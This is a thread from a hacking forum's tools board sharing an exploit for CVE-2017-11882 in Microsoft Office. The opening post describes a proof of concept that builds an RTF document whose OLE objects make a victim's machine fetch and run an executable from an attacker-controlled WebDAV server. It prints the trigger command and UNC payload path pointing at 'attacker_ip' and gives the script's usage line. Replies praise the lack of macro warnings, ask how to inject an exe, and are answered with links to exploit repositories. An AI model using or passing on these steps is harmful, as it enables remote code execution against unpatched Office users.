+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Hacking Tools (https://sinister.ly/Forum-Hacking-Tools)
+--- Thread: Exploit for CVE-2017-11882 (/Thread-Exploit-for-CVE-2017-11882)
Exploit for CVE-2017-11882 - alfascanner - 11-30-2017
CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882
MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882
Research: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about
Patch analysis: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html
DEMO PoC exploitation: https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410
webdav_exec CVE-2017-11882
A simple PoC for CVE-2017-11882. This exploit triggers WebClient service to start and execute remote file from attacker-controlled WebDav server. The reason why this approach might be handy is a limitation of executed command length. However with help of WebDav it is possible to launch arbitrary attacker-controlled executable on vulnerable machine. This script creates simple document with several OLE objects. These objects exploits CVE-2017-11882, which results in sequential command execution.
The first command which triggers WebClient service start may look like this:
Code:
cmd.exe /c start \\attacker_ip\ffAttacker controlled binary path should be a UNC network path:
Code:
\\attacker_ip\ff\1.exeUsage
Code:
webdav_exec_CVE-2017-11882.py -u trigger_unc_path -e executable_unc_path -o output_file_nameSample exploit for CVE-2017-11882 (starting calc.exe as payload)
example folder holds an .rtf file which exploits CVE-2017-11882 vulnerability and runs calculator in the system.
RE: Exploit for CVE-2017-11882 - hacxx - 12-02-2017
That's very nice and all but where is the python file "webdav_exec_CVE-2017-11882.py"
RE: Exploit for CVE-2017-11882 - BadSnow - 12-02-2017
Excellent! Without macro notifications!
RE: Exploit for CVE-2017-11882 - killerbeans24 - 12-02-2017
(11-30-2017, 07:07 AM)alfascanner Wrote: CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882
MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882
Research: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about
Patch analysis: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html
DEMO PoC exploitation: https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410
webdav_exec CVE-2017-11882
A simple PoC for CVE-2017-11882. This exploit triggers WebClient service to start and execute remote file from attacker-controlled WebDav server. The reason why this approach might be handy is a limitation of executed command length. However with help of WebDav it is possible to launch arbitrary attacker-controlled executable on vulnerable machine. This script creates simple document with several OLE objects. These objects exploits CVE-2017-11882, which results in sequential command execution.
The first command which triggers WebClient service start may look like this:
Code:cmd.exe /c start \\attacker_ip\ff
Attacker controlled binary path should be a UNC network path:
Code:\\attacker_ip\ff\1.exe
Usage
Code:webdav_exec_CVE-2017-11882.py -u trigger_unc_path -e executable_unc_path -o output_file_name
Sample exploit for CVE-2017-11882 (starting calc.exe as payload)
example folder holds an .rtf file which exploits CVE-2017-11882 vulnerability and runs calculator in the system.
Is there a way to inject an exe file into the exploit ?
RE: Exploit for CVE-2017-11882 - alfascanner - 12-04-2017
(12-02-2017, 11:01 AM)hacxx Wrote: That's very nice and all but where is the python file "webdav_exec_CVE-2017-11882.py"
There you go!
https://github.com/embedi/CVE-2017-11882/blob/master/webdav_exec_CVE-2017-11882.py
RE: Exploit for CVE-2017-11882 - alfascanner - 12-04-2017
(12-02-2017, 05:25 PM)killerbeans24 Wrote: Is there a way to inject an exe file into the exploit ?
This should be helpful.
https://github.com/unamer/CVE-2017-11882
RE: Exploit for CVE-2017-11882 - hacxx - 12-04-2017
(12-04-2017, 12:26 PM)alfascanner Wrote:(12-02-2017, 11:01 AM)hacxx Wrote: That's very nice and all but where is the python file "webdav_exec_CVE-2017-11882.py"
There you go!
https://github.com/embedi/CVE-2017-11882/blob/master/webdav_exec_CVE-2017-11882.py
Thanks...